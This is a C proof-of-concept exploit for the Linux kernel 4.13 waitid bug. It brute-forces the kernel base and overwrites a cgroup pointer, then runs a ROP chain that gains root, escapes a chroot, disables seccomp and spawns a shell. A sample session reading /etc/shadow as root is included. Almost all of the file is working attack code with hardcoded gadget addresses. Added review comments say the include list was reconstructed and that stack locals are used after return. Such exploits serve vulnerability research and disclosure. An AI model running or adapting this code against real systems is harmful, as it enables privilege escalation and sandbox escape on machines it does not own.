// Proof of concept exploit for waitid bug introduced in Linux Kernel 4.13
// By Chris Salls (twitter.com/chris_salls)
// This exploit can be used to break out of sandboxes such as that in google chrome
// In this proof of concept we install the seccomp filter from chrome as well as a chroot,
// then break out of those and get root
// Bypasses smep, but not smap
// offsets written and tested on ubuntu 17.10-beta2
/*
salls@ubuntu:~/x$ uname -a
Linux ubuntu 4.13.0-12-generic #13-Ubuntu SMP Sat Sep 23 03:40:16 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
salls@ubuntu:~/x$ gcc poc.c -lpthread -o poc
salls@ubuntu:~/x$ ./poc
Installed sandboxes. Seccomp, chroot, uid namespace
found kernel base 0xffffffff95200000
# id
uid=0(root) gid=0(root) groups=0(root)
# head /etc/shadow
root:!:17447:0:99999:7:::
daemon:*:17435:0:99999:7:::
*/

/****** overview of exploit ********
waitid uses unsafe_put_user without checking access_ok,
allowing the user to give a kernel address for infop and write over kernel memory.
when given invalid parameters this just writes the following 32 bit integers
0, 0, 0, _, 0, 0, 0    (the 4th element is unchanged)
inside the chrome sandbox we cannot fork (can only make threads)
so we can only give invalid parameters to waitid and only write 0's to kernel memory,

I start out by iteratively calling waitid until we find the kernel's base address
When it's found it will not return efault error from the syscall

Then I overwrite the upper bytes of a cgroup pointer with 0's to point it to userland
Then when calling clone() it will call the cgroup fork() handler which we control

I pivot the stack and use a rop chain to get root and remove the chroot
*/

#define _GNU_SOURCE
// NOTE(review): the header names of the original #include lines were lost
// (only bare "#include" tokens survived). The list below is reconstructed
// from the identifiers this file actually uses - confirm against the
// original source before relying on it.
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <sched.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/filter.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>

/******** constants for the sandboxing *********/
#define PR_SET_NO_NEW_PRIVS 38
#define __NR_seccomp 317
#define SECCOMP_SET_MODE_FILTER 1

/************ task offsets *************/
// from prctl_get_seccomp
#define OFFSET_OF_SECCOMP_MODE 2920
#define OFFSET_OF_SECCOMP 2928
// from sys_getcwd
#define OFFSET_OF_FS 2784
// from put_task_stack
#define OFFSET_OF_STACK 0x40
// flag for seccomp
#define OFFSET_OF_TIF_SECCOMP 1

/********** global offsets *************/
#define KERNEL_BASE_DEFAULT 0xFFFFFFFF81000000
#define CGROUP_SUBSYS 0xffffffff81ee7e60
#define FIRST_CGROUP 0xffffffff81ee98a0
#define PREPARE_KERNEL_CRED 0xffffffff810a8480
#define COMMIT_CREDS 0xffffffff810a80f0
#define INIT_TASK 0xffffffff81e10480
#define INIT_FS 0xffffffff81f23480

// 4.13+
// current sources of unreliability
// addresses we guess seem to be suboptimal
// can spray more or try better guesses
// just look at end_rodata_hpage_align

// where read/write data is in kernel
// had to play with last 3 nibbles to get it to not crash
#define start_rw_off 0x9f5fe0

/****** ROP GADGETS ********/
// a pivot. xchg esp, eax; ret;
#define STACK_PIVOT 0xffffffff8101e773
#define INCREASE_RSP_0x60 0xffffffff811465e6
// mov [rsi], rdx; ret
#define STORE_RDX_RSI_RET 0xFFFFFFFF81039D38
#define POP_RSI_RBP_RET 0xffffffff81130818
#define POP_RDX_RBP_RET 0xffffffff8105f2be
// mov rdi, rax; call rdx
#define MOV_RDI_RAX_CALL_RDX 0xffffffff818e57b2
#define POP_RBP_RET 0xFFFFFFFF818E57B7
#define POP_RDI_RET 0xffffffff8162fdfd
#define POP_RAX_RET 0xffffffff81626ab7
#define ADD_RAX_RDX_RET 0xffffffff810b4a2d
// mov [rax], rdi; pop rbp; ret
#define STORE_RDI_RAX_PRET 0xffffffff811e2165
// mov [rdi], rax; ret
// must not clobber rax
#define STORE_RAX_RDI_RET 0xffffffff81415500
// mov rax, [rax]; pop rbp; ret
#define READ_RAX_RAX_PRET 0xffffffff811214a0
// and rax, rdx; pop rbp; ret
#define AND_RAX_RDX_PRET 0xffffffff81462928
// add rax,[rdi+0x88]; pop rbp; ret;
#define ADD_RAX_READ_RDI_PRET 0xFFFFFFFF8154D277
#define POP_RSP_RET 0xffffffff81190d84
#define CGROUP_POST_FORK_PROLOGUE 0xFFFFFFFF811285AC
#define STORE_BYTE_ZERO_RAX_PRET 0xFFFFFFFF810F1D2A

// CURRENT gs:off_D300
// in ata_eh_acquire
// mov rdx, gs:off_D300; mov [rax+58h], rdx; pop rbx; pop rbp;
#define GET_CURRENT 0xFFFFFFFF816743AB

/******** cgroups that we need to restore ********/
#define cgroup_1 0xFFFFFFFF81EE98A0
#define cgroup_2 0xFFFFFFFF81E590C0
#define cgroup_3 0xFFFFFFFF81E5ED60
#define cgroup_4 0xFFFFFFFF81F6DA60

// kernel base found at runtime; written by get_base(), read by REBASE()
unsigned long kernel_base;

/*
 * Translate an address expressed relative to KERNEL_BASE_DEFAULT into the
 * corresponding address relative to the runtime value of kernel_base.
 */
unsigned long REBASE(unsigned long X) {
    return X-KERNEL_BASE_DEFAULT+kernel_base;
}

/********** HELPERS *************/

/*
 * Format a string printf-style (truncated to 1023 bytes) and write it to an
 * existing file in a single write() call.
 *
 * Returns 1 when the whole string was written, 0 on open failure or on a
 * failed/short write. On failure errno still describes the failing open() or
 * write(), so callers may follow up with perror().
 */
int write_file(const char* file, const char* what, ...)
{
    char buf[1024];
    va_list args;
    va_start(args, what);
    vsnprintf(buf, sizeof(buf), what, args);
    va_end(args);
    buf[sizeof(buf) - 1] = 0;
    size_t len = strlen(buf);

    int fd = open(file, O_WRONLY | O_CLOEXEC);
    if (fd == -1) {
        perror("open");
        return 0;
    }

    // write() returns ssize_t: test for error explicitly instead of relying
    // on -1 converting to a huge unsigned value in a mixed-sign comparison
    ssize_t written = write(fd, buf, len);
    if (written < 0 || (size_t)written != len) {
        int saved_errno = errno;  // close() may overwrite errno
        close(fd);
        errno = saved_errno;
        return 0;
    }
    close(fd);
    return 1;
}

/******** mock chrome sandbox **********/

/*
 * Put the current process into a sandbox before the rest of the program runs.
 *
 * Steps, in order:
 *   1. read a raw BPF program from the file "chrome_seccomp_filter" in the
 *      current directory (size must be a multiple of 8 bytes),
 *   2. unshare the user namespace (optional) and the network namespace,
 *   3. when the user namespace was created, write setgroups/uid_map/gid_map,
 *   4. chroot into /proc/self/fdinfo,
 *   5. when no user namespace was created, setgid/setuid to 1000,
 *   6. set PR_SET_NO_NEW_PRIVS and install the seccomp filter.
 *
 * Any failure other than the optional CLONE_NEWUSER step or the prctl call
 * terminates the process.
 */
void install_mock_chrome_sandbox() {
    FILE *f = fopen ("chrome_seccomp_filter", "rb");
    if (!f) {
        printf("couldn't open chrome_seccomp_filter\n");
        exit(-1);
    }

    fseek(f, 0, SEEK_END);
    long length = ftell (f);
    fseek(f, 0, SEEK_SET);

    // ftell() reports failure as -1; an empty file cannot hold a filter
    if (length <= 0) {
        printf("chrome_seccomp_filter is empty or its size is unknown\n");
        exit(-1);
    }
    // the file is interpreted as an array of 8-byte filter entries
    if (length%8 != 0) {
        printf("length mod 8 != 0?\n");
        exit(-1);
    }

    char *buffer = malloc((size_t)length);
    if (!buffer) {
        printf("couldn't allocate %ld bytes for the filter\n", length);
        exit(-1);
    }
    // a short read would hand a partially uninitialized program to seccomp
    if (fread(buffer, 1, (size_t)length, f) != (size_t)length) {
        printf("couldn't read chrome_seccomp_filter\n");
        exit(-1);
    }
    fclose(f);

    // set up namespace
    int real_uid = 1000;
    int real_gid = 1000;
    int has_newuser = 1;
    if (unshare(CLONE_NEWUSER) != 0) {
        // not fatal: fall back to setgid/setuid further down
        perror("unshare(CLONE_NEWUSER)");
        printf("no new user...\n");
        has_newuser = 0;
    }
    if (unshare(CLONE_NEWNET) != 0) {
        perror("unshare(CLONE_NEWNET)");
        exit(EXIT_FAILURE);
    }
    if (has_newuser && !write_file("/proc/self/setgroups", "deny")) {
        perror("write_file(/proc/self/set_groups)");
        exit(EXIT_FAILURE);
    }
    if (has_newuser && !write_file("/proc/self/uid_map", "1000 %d 1\n", real_uid)){
        perror("write_file(/proc/self/uid_map)");
        exit(EXIT_FAILURE);
    }
    if (has_newuser && !write_file("/proc/self/gid_map", "1000 %d 1\n", real_gid)) {
        perror("write_file(/proc/self/gid_map)");
        exit(EXIT_FAILURE);
    }

    // chroot
    if (chroot("/proc/self/fdinfo")) {
        perror("chroot");
        exit(EXIT_FAILURE);
    }

    // set uid
    if (!has_newuser){
        if (setgid(1000)) {
            perror("setgid");
            exit(EXIT_FAILURE);
        }
        if (setuid(1000)) {
            perror("setuid");
            exit(EXIT_FAILURE);
        }
    }

    // no new privs
    int res = prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0);
    if (res) {
        printf("no new privs failed? %d\n", res);
    }

    // filter
    struct sock_fprog prog = {
        .len = (unsigned short) (length/8),
        .filter = (struct sock_filter*)buffer,
    };

    // install filter
    if (syscall(__NR_seccomp, SECCOMP_SET_MODE_FILTER, 0, &prog)) {
        perror("seccomp");
        exit(-2);
    }
    printf("Installed sandboxes. Seccomp, chroot, uid namespace\n");
}

/***********EXPLOIT CODE************/

/*
 * Scan candidate base addresses starting at 0xffffffff00000000 in steps of
 * 0x100000, calling waitid with infop = guess + start_rw_off each time.
 * The first guess for which errno is not 14 after the call is stored in
 * kernel_base and returned.
 *
 * Returns (unsigned long)-1 when the guess wraps around to 0 without a hit.
 */
unsigned long get_base() {
    // first we try doing our arb write to find the system base address
    // if syscall is 0 we didn't fault
    unsigned long start = 0xffffffff00000000;
    unsigned long inc =   0x0000000000100000;
    unsigned long guess = start;
    while (guess != 0) {
        syscall(SYS_waitid, P_ALL, 0, guess+start_rw_off, WEXITED, NULL);
        // 14 is the errno the overview comment refers to as "efault"
        if (errno != 14) {
            printf("found kernel base 0x%lx\n", guess);
            kernel_base = guess;
            return guess;
        }
        guess += inc;
    }
    printf("failed to find base address...");
    return -1;
}

/*
 * Build the chain of rebased gadget addresses and operands in a local array,
 * copy it to addr, patch the marker slot, and append ten filler words.
 *
 * addr: destination buffer; must have room for the whole chain plus 10 words.
 *
 * NOTE(review): the chain embeds the addresses of the locals rax_val and
 * current_val as scratch locations, and those addresses are used after this
 * function has returned - confirm that is acceptable for the caller.
 */
void create_rop(unsigned long *addr) {
    unsigned long current_val = 0;
    unsigned long rax_val = 0;
    unsigned long ROP[] = {
        // save rax which has lower 32 bits of rsp in it
        REBASE(POP_RDI_RET),
        (unsigned long)&rax_val,
        REBASE(STORE_RAX_RDI_RET),

        // fix up cgroup
        // cgroup 1
        REBASE(POP_RSI_RBP_RET),
        REBASE(CGROUP_SUBSYS),
        0x42424242,
        REBASE(POP_RDX_RBP_RET),
        REBASE(cgroup_1),
        0x42424242,
        REBASE(STORE_RDX_RSI_RET),
        // cgroup 2
        REBASE(POP_RSI_RBP_RET),
        REBASE(CGROUP_SUBSYS+8),
        0x42424242,
        REBASE(POP_RDX_RBP_RET),
        REBASE(cgroup_2),
        0x42424242,
        REBASE(STORE_RDX_RSI_RET),
        // cgroup 3
        REBASE(POP_RSI_RBP_RET),
        REBASE(CGROUP_SUBSYS+16),
        0x42424242,
        REBASE(POP_RDX_RBP_RET),
        REBASE(cgroup_3),
        0x42424242,
        REBASE(STORE_RDX_RSI_RET),
        // cgroup 4
        REBASE(POP_RSI_RBP_RET),
        REBASE(CGROUP_SUBSYS+24),
        0x42424242,
        REBASE(POP_RDX_RBP_RET),
        REBASE(cgroup_4),
        0x42424242,
        REBASE(STORE_RDX_RSI_RET),

        // get root
        REBASE(POP_RDI_RET),
        0,
        REBASE(PREPARE_KERNEL_CRED),
        // set rdx for the mov rdi, rdx; call rdx gadget
        REBASE(POP_RDX_RBP_RET),
        REBASE(POP_RBP_RET),
        0x42424242,
        REBASE(MOV_RDI_RAX_CALL_RDX),
        REBASE(COMMIT_CREDS),

        // escape the chroot (copy init process fs)
        // get current
        REBASE(POP_RAX_RET),
        (unsigned long)((&current_val))-0x58,
        REBASE(GET_CURRENT),
        // current is now in rdx
        0x42424242,
        0x42424242,
        REBASE(POP_RAX_RET),
        OFFSET_OF_FS,
        REBASE(ADD_RAX_RDX_RET),
        // rax now points to my fs
        REBASE(POP_RDI_RET),
        REBASE(INIT_FS),
        // rdi points to init fs
        // change my fs
        REBASE(STORE_RDI_RAX_PRET),
        0x42424242,

        // disable seccomp
        REBASE(POP_RAX_RET),
        OFFSET_OF_SECCOMP_MODE,
        REBASE(ADD_RAX_RDX_RET),
        // rax now points to seccomp mode
        REBASE(POP_RDI_RET),
        0,
        REBASE(STORE_RDI_RAX_PRET),
        0x42424242,
        REBASE(POP_RAX_RET),
        OFFSET_OF_SECCOMP,
        REBASE(ADD_RAX_RDX_RET),
        // rax now points to seccomp
        REBASE(POP_RDI_RET),
        0,
        REBASE(STORE_RDI_RAX_PRET),
        0x42424242,
        REBASE(POP_RAX_RET),
        OFFSET_OF_TIF_SECCOMP,
        REBASE(ADD_RAX_RDX_RET),
        // rax now points to flag with seccomp enabled
        REBASE(STORE_BYTE_ZERO_RAX_PRET),
        0x42424242,

        // now we can return
        // restore rsp from saved_eax+(current->stack)&0xffffffff00000000
        // grab stack pointer from current
        REBASE(POP_RAX_RET),
        OFFSET_OF_STACK,
        REBASE(ADD_RAX_RDX_RET),
        // rax now points to &task->stack
        REBASE(READ_RAX_RAX_PRET),
        // rax is now the stack pointer from task
        0x42424242,
        // & 0xffffffff00000000
        REBASE(POP_RDX_RBP_RET),
        0xffffffff00000000,
        0x42424242,
        REBASE(AND_RAX_RDX_PRET),
        // rax = stack&0xffffffff00000000
        0x42424242,
        REBASE(POP_RDI_RET),
        ((unsigned long)&rax_val)-0x88, // sub 0x88 since it's read [rdi+0x88]
        REBASE(ADD_RAX_READ_RDI_PRET),
        // rax should be equal to our original stack value
        0x42424242,
        // and overwrite the popped rsp value at marker
        REBASE(POP_RDI_RET),
        0x66666666, // address of marker
        REBASE(STORE_RAX_RDI_RET),
        // edit return address in rsp to skip to prologue (since rbp is broken)
        REBASE(POP_RDI_RET),
        REBASE(CGROUP_POST_FORK_PROLOGUE),
        REBASE(STORE_RDI_RAX_PRET),
        0x42424242,
        // now return to kernel
        REBASE(POP_RSP_RET),
        0x77777777, // marker
    };

    unsigned long i = 0;
    for(i = 0; i < sizeof(ROP)/8; i++) {
        addr[i] = ROP[i];
    }
    // set up marker
    // the 0x66666666 placeholder (8th word from the end) is replaced with the
    // address of the final word, i.e. the 0x77777777 marker slot
    addr[sizeof(ROP)/8-8] = (unsigned long)&addr[sizeof(ROP)/8-1];
    // pad with ten filler words after the chain
    unsigned long end = i+10;
    for(; i < end; i++) {
        addr[i] = 0x4141414141;
    }
}

/* Thread entry point that does nothing; used only to make a thread exist. */
void *empty_thread(void *arg) {
    return NULL;
}

/*
 * Map two pages at the address given by the low 24 bits of the rebased
 * FIRST_CGROUP, fill them with the fake handler slots and the chain from
 * create_rop(), issue the waitid write at CGROUP_SUBSYS+3, create a thread,
 * and finally spawn /bin/sh. Exits the process if the mapping fails.
 */
void do_exploit() {
    // mmap the userland address where the pointer will be after the partial overwrite
    unsigned long cgroup_base = 0xffffff&REBASE(FIRST_CGROUP);
    long* addr = (long*)mmap((void*)(cgroup_base&0xfff000), 0x2000, PROT_READ | PROT_WRITE,
                             MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
    if(addr == (void*)-1) {
        printf("mmap failed\n");
        exit(-1);
    }

    // set up the fake cgroup fork call
    *(unsigned long*)(cgroup_base+0x60) = REBASE(STACK_PIVOT);
    // skip over the stack pivot at offset 0x60
    *(unsigned long*)(cgroup_base) = REBASE(INCREASE_RSP_0x60);

    // set up a rop chain
    create_rop((unsigned long*)(cgroup_base+0x68));

    printf("Executing rop chain\n");

    // overwrite upper 5 bytes of the first cgroup subsys pointer
    // we will fix the cgroup pointers in the rop chain
    syscall(SYS_waitid, P_ALL, 0, REBASE(CGROUP_SUBSYS)+3, WEXITED, NULL);

    // now trigger cgroup fork to execute the rop chain
    pthread_t th1;
    pthread_create(&th1, NULL, empty_thread, NULL);

    // now we should be root
    printf("Should be root\n");
    system("/bin/sh");
}

/*
 * Entry point: install the mock sandbox, make stdout unbuffered, locate the
 * kernel base, then run do_exploit(). Returns -1 when get_base() fails.
 */
int main() {
    install_mock_chrome_sandbox();
    setvbuf(stdout, NULL, _IONBF, 0);

    long ret = get_base();
    if (ret == -1) {
        printf("failed to get kernel base address\n");
        return -1;
    }

    do_exploit();
    return 0;
}